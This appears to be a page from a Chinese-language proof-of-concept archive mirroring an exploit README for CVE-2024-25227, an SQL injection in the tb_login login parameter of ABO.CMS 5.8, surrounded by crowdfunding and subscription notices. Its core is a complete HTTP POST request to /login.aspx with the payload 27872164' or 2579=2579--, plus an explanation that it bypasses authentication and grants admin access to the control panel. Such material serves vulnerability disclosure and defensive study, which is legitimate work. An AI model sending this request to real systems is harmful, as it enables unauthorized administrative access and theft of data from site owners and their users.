目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2024-25227 PoC — ABO.CMS 安全漏洞

来源
关联漏洞
标题: ABO.CMS 安全漏洞 (CVE-2024-25227)
Description:ABO.CMS是一个内容管理平台。 ABO.CMS 5.8版本存在安全漏洞,该漏洞源于存在SQL注入漏洞,允许远程攻击者执行任意代码、导致拒绝服务(DoS)、提升权限并通过管理登录页面中的tb_login参数获取敏感信息。
介绍
# ABO.CMS-EXPLOIT-Unauthenticated-Login-Bypass-CVE-2024-25227

**CVE-2024-25227**
**Exploit**

CVE-2024-25227 is a ABO.CMS 5.8 SQLi vulnerability found in the parameter "tb_login"

<h2>PoC:</h2>

```
POST /login.aspx HTTP/1.1

Host: localhost

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/535.36 (KHTML, like Gecko) Chrome/104.0.5735.134 Safari/527.36

Connection: close

Cache-Control: max-age=0

Cookie: ASP.NET_SessionId=asd123hstjj

Origin: http://localhost

Upgrade-Insecure-Requests: 1

Referer: http://ip

Content-Type: application/x-www-form-urlencoded

Content-Length: 100

VIEWSTATE=%2ASDkjdkjfkgajsslfk&EVENTVALIDATION=%2;llkfopkorjaeitjru123&tb_login=27872164'%20or%202579%3d2579--%20&tb_pwd=hf%36nb4u%84X5&b_submit=+%C3+%D7+%CE+%C5+

```
<h2>Details</h2>

The payload is **tb_login=27872164'%20or%202579%3d2579--%20**, this without URL encoding is:
**27872164' or 2579=2579--**

With the modified request with the payload, you are telling the backend, placeholder *"27872164'"* is combined with a condition that always evaluates to true *("2579=2579")*, and to comment the remainder of everything else out in the query with *"--"* as to ensure the modified query is injected.
This effectively bypasses any and all authentication checks related to the "tb_login" field, allowing unauthenticated access to the control panel with admin.
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →